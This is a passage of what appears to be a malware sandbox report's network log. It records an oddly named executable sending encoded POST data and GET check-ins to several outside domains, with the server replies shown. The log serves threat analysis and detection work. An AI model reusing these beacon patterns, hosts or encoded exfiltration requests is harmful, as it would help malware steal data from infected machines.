                  Data Ascii: gd=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHt3vsotwZaa/xJytARCvrI6zHO6MPLjTc1nz6i/Yco5DG0YPCF4EPdrv9h7mHY3OEl2H7eTntBqilSky1Fj7J+ysZzoTtE0f8R8aYWn9Y+BX8s3wM0COl6F2xJy4uN6Z7mX1z7tihhhyClohwkaoojWy08IDQKt5Oqu75qYt59YOXw30eAArtwd5XbczGtow2tCaBw4huFAi7YtdajJqUh8LNljubr7jG68Fpp4IjCUZjy0s5DShdmDZuxolNycWt3lDXa7xEA7HL8AQR4MFA9z9CkigSh6sdyL0hdLM2dWq8KiWCgfGaeuDMM9KICz408wRW3YaHDL7027gUs+Qa87Aax4bp4CyVrLY34wgyrR901lukpkHhRewEJBb55btdCuHI7UIrmDWzhHtx7Q0iXm+Bm16DjXCuP0n/g6meH0taHnd2gW+0H8G9TDGC/yi7R3Ltgs/EIy32+JJwAP9j230V+rseZyQiCYSlUGvu0rAETaDqk3G68UCanGpRkcQOf3dTnq7vAAIzb0tW91Bnsh/JC0/1OTRO80cXGkmXSoOIR+N+cebnDCpMCpbcj4ZLOVI4GCaU2KzSm+dr3ZIsL3okvouLJx7XsYeo0qacxXis2uOsj9ZJipoie/6YPG8TPXp5dk2xOwFZFV38/PxI07d6RwWiXFT4oXsXaY+WHK4yDfk+tdA6xZKcLI89F8rMrzN0PxHNW9CtPdPNRxK2nDJcfN15bxgeB9kCilrd+fJiIZe0SoeRfotaP/vyZK86z23KWrA5UhUYksrrdM9JD0ZGs4odBy3kTUSUXfU36arI8cwXhLchNA/X/4BcT3RvZUGfMQqNPsoiu3RSRAtxWoV6caoB1uF8/Dpf04lac0Q1dvIT0VzMMnCmUGEAav8Tp/l/0bN2r6cZ7o6iAuO1/SGtV3Hv5/8T3Q/3o2sjMpmJ4H0Lx7VUG7SbcFj7QkQv8qdVwKX [TRUNCATED]
                  Sep 14, 2024 11:11:34.569891930 CEST368INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:34 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.44974118.139.62.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:36.221396923 CEST515OUTGET /p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:11:37.124176979 CEST510INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:36 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdH
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.44974266.81.203.10803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:42.404767036 CEST775OUTPOST /osde/ HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.mediaplug.biz
                  Referer: http://www.mediaplug.biz/osde/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 73 72 49 58 4a 63 53 63 6b 68 56 48 75 4f 74 6e 34 44 77 38 33 36 4f 79 4a 38 70 5a 6e 39 65 57 7a 70 54 2f 65 35 41 39 78 6e 46 30 50 56 66 56 51 47 62 39 45 45 6c 49 50 66 6c 5a 5a 48 68 63 7a 34 4c 4c 35 63 70 62 49 47 47 63 45 69 6a 37 6b 41 46 46 52 49 55 32 76 43 33 48 77 6b 42 43 6d 38 72 6d 34 48 76 47 37 4e 2f 51 30 61 4d 68 67 38 62 30 72 6b 58 63 66 41 43 41 78 6c 61 4d 72 32 64 63 7a 54 5a 4b 37 72 46 47 64 6c 38 4f 51 35 66 6a 4f 48 69 61 74 5a 61 64 58 32 4a 2f 41 36 76 6f 55 4a 2b 38 4f 2f 62 50 43 68 32 2f 64 30 56 61 4b 51 3d 3d
                  Data Ascii: gd=cUZt2z1pvMaysrIXJcSckhVHuOtn4Dw836OyJ8pZn9eWzpT/e5A9xnF0PVfVQGb9EElIPflZZHhcz4LL5cpbIGGcEij7kAFFRIU2vC3HwkBCm8rm4HvG7N/Q0aMhg8b0rkXcfACAxlaMr2dczTZK7rFGdl8OQ5fjOHiatZadX2J/A6voUJ+8O/bPCh2/d0VaKQ==
                  Sep 14, 2024 11:11:42.992011070 CEST727INHTTP/1.1 405 Not Allowed
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:42 GMT
                  Content-Type: text/html
                  Content-Length: 575
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.44974366.81.203.10803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:44.943120956 CEST795OUTPOST /osde/ HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.mediaplug.biz
                  Referer: http://www.mediaplug.biz/osde/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 32 57 7a 4d 76 2f 4d 6f 41 39 79 6e 46 30 58 6c 66 55 50 57 62 32 45 45 6f 31 50 65 5a 5a 5a 48 64 63 7a 38 50 4c 34 76 42 45 49 57 47 53 49 43 6a 35 71 67 46 46 52 49 55 32 76 42 4b 69 77 6b 5a 43 6d 76 7a 6d 71 54 37 42 6c 64 2f 52 38 36 4d 68 6b 38 62 4b 72 6b 57 78 66 43 32 2b 78 6e 79 4d 72 79 52 63 77 43 5a 4a 67 37 46 49 54 46 38 51 63 38 36 63 57 46 7a 42 6b 4b 6d 45 65 6d 63 63 4d 63 2b 79 46 34 66 72 63 2f 2f 38 66 6d 2f 4c 51 33 6f 54 52 64 79 51 53 4a 42 7a 33 39 48 41 71 4e 50 68 5a 50 37 2b 64 65 34 3d
                  Data Ascii: gd=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL2WzMv/MoA9ynF0XlfUPWb2EEo1PeZZZHdcz8PL4vBEIWGSICj5qgFFRIU2vBKiwkZCmvzmqT7Bld/R86Mhk8bKrkWxfC2+xnyMryRcwCZJg7FITF8Qc86cWFzBkKmEemccMc+yF4frc//8fm/LQ3oTRdyQSJBz39HAqNPhZP7+de4=
                  Sep 14, 2024 11:11:45.517853022 CEST727INHTTP/1.1 405 Not Allowed
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:45 GMT
                  Content-Type: text/html
                  Content-Length: 575
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.44974466.81.203.10803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:47.491945982 CEST10877OUTPOST /osde/ HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.mediaplug.biz
                  Referer: http://www.mediaplug.biz/osde/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 41 63 63 62 58 4e 42 4a 58 6e 47 4f 48 42 50 56 72 2b 62 31 34 70 4a 75 43 49 62 4a 39 59 33 70 4f 6f 6c 73 69 72 42 39 6a 76 47 70 6c 50 51 58 4c 32 56 64 6c 44 4a 4b 6e 2f 64 34 2b 48 65 7a 48 79 73 52 59 34 6d 39 45 73 41 35 48 36 42 4d 77 56 77 79 5a 33 37 55 79 4c 48 49 36 43 57 57 49 58 32 6c 4b 50 64 76 7a 6e 44 76 32 6d 43 7a 4a 50 55 6d 61 76 66 46 38 6d 66 65 62 36 48 55 6a 6e 6c 6f 59 38 72 6e 48 44 57 6a 4e 65 34 71 57 44 52 57 39 55 4d 4d 65 74 61 51 56 74 66 64 4a 53 4c 4f 6a [TRUNCATED]
                  Data Ascii: gd=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL+Wz67/ef89znF0aFfJPWbrEHYxPeUsZBZchJbLx+BEGWGSGSj4kAFqRIEyvCyiwkZCmtHm63vBnd/Q0aMtg8anrkOPfCjLwXSMqW9c2wxJs7FdUF9Dc8+9WF/NkLS+ekAccbXNBJXnGOHBPVr+b14pJuCIbJ9Y3pOolsirB9jvGplPQXL2VdlDJKn/d4+HezHysRY4m9EsA5H6BMwVwyZ37UyLHI6CWWIX2lKPdvznDv2mCzJPUmavfF8mfeb6HUjnloY8rnHDWjNe4qWDRW9UMMetaQVtfdJSLOj/M0qRztPJYxXV2OWJWkh0LPDIx1H0rCkp9na9tURANE73XL4GuDDeHHUnfESM9DU8zPoiwO9PIAmGdgJABmYnJ5ZqDaZE6uCYUyQLzwHZZs6I4qGhzh76YeP/f4GwGYBCvVrMFZ7iNR+x/EIhUr7LIwAuFc/yYzc/UVGJ9Hekqu46ArEBb/7pr/1Cgx73550W/PLYMr5K5D6zCM3j3lXpxiQ//7BlO60xBATPZcF8YoXqinxIUg9kUNHUQpqYT5/8GLb7X6Lz5/RG8ZRLPxEr5RDWx9rgigSOOLjIb8YF/UJN17E6qgo0+KfGGng2edmioNA+aDxt6ip2tqo7LHimzoUDRoGk6SLjnDsQfmiRlhnKzVk8vtwydPBOe8xxcjJMflbvPvCrHYaZKfLJ1GPHOdruJkxobF8RyWhwNxs5oYq0eknBDqKvbb6nTAYNT/kfAC/iyOqfljJJuLlqRsOAlOreDQmSBb3XO48vJhcoxdCfj3gsUtPWC76xhLLdR7HXMoIfqSxk+tXcwlG4mmEk8GAEdOEjIICoflneChyp3QbgIKh4BJyv3uCDIIAGAxlpyQMPDn0euhw2D3Ou/dri/qhD/Vgc3KAzoMhDuIVJj2imSNlM9zbb+sGbzsI2ej3OmZRhZyjEgNz9JyuP1+0lggS1qgfITDmcc [TRUNCATED]
                  Sep 14, 2024 11:11:48.087112904 CEST727INHTTP/1.1 405 Not Allowed
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:48 GMT
                  Content-Type: text/html
                  Content-Length: 575
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.44974566.81.203.10803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:50.040980101 CEST511OUTGET /osde/?gd=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:11:50.612376928 CEST1236INHTTP/1.1 200 OK
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:50 GMT
                  Content-Type: text/html
                  Content-Length: 1432
                  Last-Modified: Tue, 14 May 2024 12:20:23 GMT
                  Connection: close
                  ETag: "66435707-598"
                  Accept-Ranges: bytes
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 23 70 61 72 74 6e 65 72 2c 0d 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0d [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div style="text-align: center;"> <p>This domain is pending renewal or has expired. Please contact the domain provider with questions.</p></div> <div id="partner"></div> <script type="text/j
                  Sep 14, 2024 11:11:50.612507105 CEST224INData Raw: 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61
                  Data Ascii: avascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor22' + '/park.j
                  Sep 14, 2024 11:11:50.612517118 CEST206INData Raw: 73 3f 62 65 66 6f 72 65 42 6f 64 79 45 6e 64 48 54 4d 4c 3d 25 33 43 70 25 33 45 54 68 69 73 2b 64 6f 6d 61 69 6e 2b 69 73 2b 70 65 6e 64 69 6e 67 2b 72 65 6e 65 77 61 6c 2b 6f 72 2b 68 61 73 2b 65 78 70 69 72 65 64 2e 2b 50 6c 65 61 73 65 2b 63
                  Data Ascii: s?beforeBodyEndHTML=%3Cp%3EThis+domain+is+pending+renewal+or+has+expired.+Please+contact+the+domain+provider+with+questions.%3C%2Fp%3E">' + '<\/script>' ) </script> </body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.449746103.42.108.46803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:56.460100889 CEST790OUTPOST /yl6y/ HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.independent200.org
                  Referer: http://www.independent200.org/yl6y/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 59 4a 42 54 2b 2b 5a 37 76 57 6a 6d 45 69 43 66 51 78 66 5a 4f 52 53 4e 2b 4f 38 39 44 54 76 55 39 41 3d 3d
                  Data Ascii: gd=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5YJBT++Z7vWjmEiCfQxfZORSN+O89DTvU9A==
                  Sep 14, 2024 11:11:57.284892082 CEST154INHTTP/1.1 403 Forbidden
                  Content-Type: text/plain; charset=utf-8
                  Date: Sat, 14 Sep 2024 09:11:57 GMT
                  Content-Length: 11
                  Connection: close
                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                  Data Ascii: Bad Request


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.449747103.42.108.46803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
